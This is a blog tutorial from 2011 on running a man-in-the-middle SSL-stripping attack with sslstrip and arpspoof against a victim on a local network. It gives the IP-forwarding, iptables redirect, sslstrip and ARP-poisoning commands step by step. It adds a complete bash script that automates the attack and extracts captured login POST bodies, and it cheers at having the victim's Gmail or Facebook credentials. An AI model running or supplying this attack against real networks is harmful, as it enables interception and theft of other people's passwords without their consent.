Saturday, 24 December 2011

man in the middle attack using ssl strip


SSL STRIP

This tool provides a demonstration of the HTTPS stripping attacks that I presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.

Requirements
 For sslstrip (in BackTrack 5):
  • Python >= 2.5 (apt-get install python)
  • The python "twisted-web" module (apt-get install python-twisted-web)

Setup

  • tar zxvf sslstrip-0.9.tar.gz
  • cd sslstrip-0.9
  • (optional) sudo python ./setup.py install

Man in the Middle Attack Using SSL STRIP

step 1 : open a terminal and enable IP forwarding

echo "1" > /proc/sys/net/ipv4/ip_forward

This flips your machine into forwarding mode, so the packets the victim sends to you (once ARP spoofing starts in step 4) are passed on to the real gateway instead of being dropped. Without it the victim loses connectivity the moment the spoofing begins, which is the quickest way to get noticed.


step 2 : now set up iptables to redirect HTTP traffic to sslstrip

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>

in my case

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 7777

This rule takes every TCP connection to port 80 that arrives from the network (PREROUTING, so the victim's forwarded traffic, not your own) and redirects it to local port 7777, where sslstrip will be listening. Only port 80 is touched; the victim's direct HTTPS (443) connections are not redirected, which is why the attack depends on stripping the HTTPS links out of the plain HTTP pages first.


step 3 : now run sslstrip

path - /pentest/web/sslstrip

./sslstrip.py -l <listenPort> -w <log file name>

in my case

./sslstrip.py -l 7777 -w mitm

-l sets the port sslstrip listens on; it must match the --to-port from step 2. -w writes everything sslstrip captures, including the bodies of POST requests, to the named file. The name is used exactly as given, so this run writes to a file called mitm in the current directory (/pentest/web/sslstrip); without -w the default is sslstrip.log.



step 4 : don't close this terminal. Open a new terminal and run arpspoof so that the victim's traffic passes through your machine.

Run arpspoof to convince the victim that your machine is the gateway:

arpspoof -i <interface> -t <targetIP> <gatewayIP>

in my case

arpspoof -i eth1 -t 192.168.1.102 192.168.1.1

This poisons the victim's ARP cache: 192.168.1.102 now maps the gateway address 192.168.1.1 to your MAC and sends everything bound for the internet to you first. The gateway's own ARP cache is left alone, which is enough here because sslstrip answers the redirected port-80 connections itself and the kernel forwards the rest (step 1). arpspoof keeps sending forged replies until you stop it with Ctrl-C, at which point it re-ARPs the victim with the gateway's real MAC.
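The four steps above, collected into one script as an added example for this page (this is not part of sslstrip, dsniff or BackTrack). It checks the port and addresses before touching anything, applies steps 1 to 4 in order, and installs a cleanup trap that restores the original ip_forward value, deletes the NAT rule and stops both tools when the run ends or is interrupted, so a Ctrl-C does not leave the box forwarding with a dangling REDIRECT. It assumes the BackTrack 5 layout used in the tutorial (sslstrip in /pentest/web/sslstrip, arpspoof on PATH), root privileges, and the sslstrip log layout of a "POST Data (host):" header line followed by the request body, which is what sslstrip 0.9 writes with -w; the sample log lines in the usage below are constructed.

```shell
#!/bin/bash
# Added example for this page (not part of sslstrip, dsniff or BackTrack):
# the four tutorial steps in one script, with input checks and a cleanup
# trap that restores ip_forward, deletes the NAT rule and stops both tools
# when the run ends or is interrupted. Assumes the BackTrack 5 layout used
# above (sslstrip in /pentest/web/sslstrip, arpspoof on PATH) and root.

SSLSTRIP_DIR=/pentest/web/sslstrip   # path from the tutorial

# Return 0 if $1 is a TCP port in 1..65535, else 1.
valid_port() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Return 0 if $1 is a dotted-quad IPv4 address with every octet in 0..255.
valid_ipv4() {
    local ip="$1" IFS=. octet n=0
    for octet in $ip; do
        case "$octet" in
            ''|*[!0-9]*) return 1 ;;
        esac
        [ "$octet" -le 255 ] || return 1
        n=$((n + 1))
    done
    [ "$n" -eq 4 ]
}

# Print the iptables arguments for step 2; $1 is A (add) or D (delete),
# $2 the sslstrip listen port. One place, so teardown always matches setup.
nat_rule() {
    echo "-t nat -$1 PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port $2"
}

# Print the request bodies sslstrip logged with -w: each "POST Data (host):"
# header line is followed by the body on the next line (assumed log format,
# as written by sslstrip 0.9).
logged_posts() {
    awk '/POST Data \(/ { want = 1; next } want && NF { print; want = 0 }' "$1"
}

# Undo everything run_attack did; safe to run more than once.
cleanup() {
    kill "$arp_pid" "$strip_pid" 2>/dev/null
    iptables $(nat_rule D "$port") 2>/dev/null      # unquoted on purpose: word-split args
    echo "$saved_forward" > /proc/sys/net/ipv4/ip_forward
}

# run_attack <interface> <victimIP> <gatewayIP> [listenPort] [logfile]
run_attack() {
    iface="$1" victim="$2" gateway="$3" port="${4:-7777}" logfile="${5:-mitm}"
    valid_port "$port" || { echo "bad port: $port" >&2; return 1; }
    valid_ipv4 "$victim" && valid_ipv4 "$gateway" || { echo "bad IP address" >&2; return 1; }
    [ "$(id -u)" -eq 0 ] || { echo "run as root" >&2; return 1; }

    saved_forward=$(cat /proc/sys/net/ipv4/ip_forward)   # restored by cleanup
    trap cleanup EXIT INT TERM

    echo 1 > /proc/sys/net/ipv4/ip_forward                                      # step 1
    iptables $(nat_rule A "$port")                                              # step 2
    (cd "$SSLSTRIP_DIR" && exec python sslstrip.py -l "$port" -w "$logfile") &  # step 3
    strip_pid=$!
    arpspoof -i "$iface" -t "$victim" "$gateway" &                              # step 4
    arp_pid=$!
    echo "sslstrip pid $strip_pid, arpspoof pid $arp_pid; Ctrl-C stops and cleans up" >&2
    wait "$arp_pid"
}

case "${1:-}" in
    '')   ;;                                              # no arguments: functions only
    show) logged_posts "${2:?usage: $0 show <logfile>}" ;;
    *)    run_attack "$@" ;;
esac
```

Usage: `./mitm.sh eth1 192.168.1.102 192.168.1.1` reproduces the tutorial exactly (port 7777, log file mitm), and `./mitm.sh show /pentest/web/sslstrip/mitm` afterwards prints just the captured POST bodies, one per line, instead of the whole log. The sslstrip process is started with `exec` inside the subshell so that the PID the trap kills is python itself and not a wrapper shell.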


On the victim machine

If the commands above succeeded, the victim's ARP cache has been changed by arpspoof and its web traffic now passes through your machine, where everything on port 80 is handled by sslstrip.

When the victim goes to Gmail by typing gmail.com or following a link, the page that comes back is the real Gmail page, fetched from Google over HTTPS by sslstrip and handed to the victim over plain HTTP. It looks exactly like the real site; the one visible difference is that the real Gmail is HTTPS while this one is HTTP (no https:// in the address bar and no lock icon).

When the victim types his or her credentials into that page, the browser sends them in a plain HTTP POST to sslstrip, which forwards the request to Google over HTTPS and writes the POST body to the log file in /pentest/web/sslstrip. arpspoof only steers the traffic to you; it is sslstrip that records it. The same happens for any other site whose login form is reached through a stripped link, Facebook for example.

in my case

log file name - mitm (the name given to -w in step 3)

You now have the victim's credentials in that file :D

Two caveats. sslstrip can only strip the HTTPS links and redirects that pass through it in the clear, so a victim who types https:// directly or opens an HTTPS bookmark is never downgraded. And a browser that already knows a site through HSTS refuses to load it over HTTP at all, so against such sites the attack fails however the victim arrives.


If you have any questions, feel free to ask.
:D

